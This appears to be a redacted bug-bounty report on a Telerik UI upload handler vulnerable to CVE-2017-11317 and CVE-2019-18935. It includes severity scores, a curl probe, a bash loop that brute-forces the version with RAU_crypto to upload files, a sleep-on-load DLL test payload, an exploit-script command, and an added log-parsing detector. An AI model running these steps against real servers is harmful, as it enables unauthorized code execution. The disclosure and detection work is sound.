CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 0.908 High
Percentile: 98.3%
Description:
https://██████/██████████/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.
https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui
An attacker can execute code on the vulnerable server, allowing an attacker to gain a foothold and exfiltrate data. Depending on the security posture of the underlying system, an attacker may be able to escalate privileges or laterally move to other systems within the network using this access.
████
Telerik UI Version ███
CVE-2017-11317, CVE-2019-18935
First, confirm the file upload handler is registered by issuing the following request:
curl -sk https://██████████/██████████/Telerik.Web.UI.WebResource.axd?type=rau
You should see the following response:
{ "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." }
Next, you will need to install RAU_crypto (https://github.com/bao7uo/RAU_crypto) and use it to submit upload requests with known vulnerable versions until finding the correct version. After RAU_crypto has been installed, you can use the following script (with the attached versions.txt file):
echo 'test' > testfile.txt                      # dummy file to upload
while IFS= read -r VERSION; do                  # one Telerik version string per line of versions.txt
    echo -n "$VERSION: "
    # URL is quoted so the shell does not treat '?' as a glob; stderr is discarded to keep the output to one line per version
    python3 RAU_crypto.py -P '█████' "$VERSION" testfile.txt 'https://█████████/█████/Telerik.Web.UI.WebResource.axd?type=rau' 2>/dev/null | grep fileInfo || echo
done < versions.txt
This uploads a file (in this case, testfile.txt) to the █████ directory on the target server. The contents of my testfile.txt simply included the word “test”.
The script should eventually identify a vulnerable version (████████), indicating the file upload succeeded and showing an encrypted blob of data related to the uploaded file:
█████████: {"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":█████ }
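From the defender's side, the version-guessing loop above produces a burst of POSTs to the RadAsyncUpload handler within a few seconds, which is a recognisable shape in web server logs. The following added example (not part of the report or of RAU_crypto) parses a constructed IIS-style log format and flags clients that show that pattern; the log format, the sample lines, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed IIS-style lines (not from the report): date time method uri-stem uri-query client-ip status
SAMPLE_LOG = """\
2020-07-02 07:01:30 GET /Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 200
2020-07-02 07:01:31 POST /Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 200
2020-07-02 07:01:32 POST /Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 200
2020-07-02 07:01:33 POST /Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 200
2020-07-02 07:05:00 GET /Telerik.Web.UI.WebResource.axd type=jsm 203.0.113.9 200
2020-07-02 09:00:00 POST /Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200
"""
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")

def parse_log(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
            "method": m.group(2), "path": m.group(3), "query": m.group(4),
            "client": m.group(5), "status": int(m.group(6)),
        })
    return events

def is_rau_upload(ev):
    """True for a POST to the RadAsyncUpload handler, i.e. an upload attempt."""
    return (ev["method"] == "POST"
            and ev["path"].lower().endswith("telerik.web.ui.webresource.axd")
            and "type=rau" in ev["query"].lower())

def find_rau_bursts(events, threshold=3, window=timedelta(seconds=60)):
    """Return {client: most uploads seen inside one `window`} for clients reaching threshold."""
    by_client = defaultdict(list)
    for ev in events:
        if is_rau_upload(ev):
            by_client[ev["client"]].append(ev["ts"])
    flagged = {}
    for client, times in by_client.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window's left edge forward
                start += 1
            if end - start + 1 >= threshold:
                flagged[client] = max(flagged.get(client, 0), end - start + 1)
    return flagged
```

A single successful upload (the 09:00 request from 203.0.113.9) is not flagged at the default threshold; lower it to 1 to list every client that used the upload handler at all.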
Now that we know we can upload a file to the target, we can attempt to exploit the deserialization vulnerability. To do this, we can compile and upload a DLL that causes the server to sleep for 10 seconds before responding:
#include <windows.h>
#include <stdio.h>

// Runs when the assembly is loaded; the delay is the only observable effect.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
        Sleep(10000); // Time interval in milliseconds.
    return TRUE;
}
As a .NET application will only load an assembly once with a given name, the dll from my test will only successfully sleep the server on the first exploit. I have compiled and attached an unused dll for testing purposes if desired (if not, just follow the steps from the link in the references section).
Now that we have our test payload ready, we can use the attached CVE-2019-18935.py script to upload and execute the dll.
python3 CVE-2019-18935.py -u https://███████/███/Telerik.Web.UI.WebResource.axd?type=rau -v ██████████ -f '███' -p sleep_2020070207013954_amd64.dll
> Note: I’m having trouble getting the server to sleep with the crafted .dll. The files are getting uploaded, but do not seem to be causing the server to sleep as expected. It is 02:30 AM here at the moment so I am heading to bed but will update tomorrow with more info in the comments, and will end up self closing if I can’t get execution.
Update TelerikUI to the latest (or a patched) version.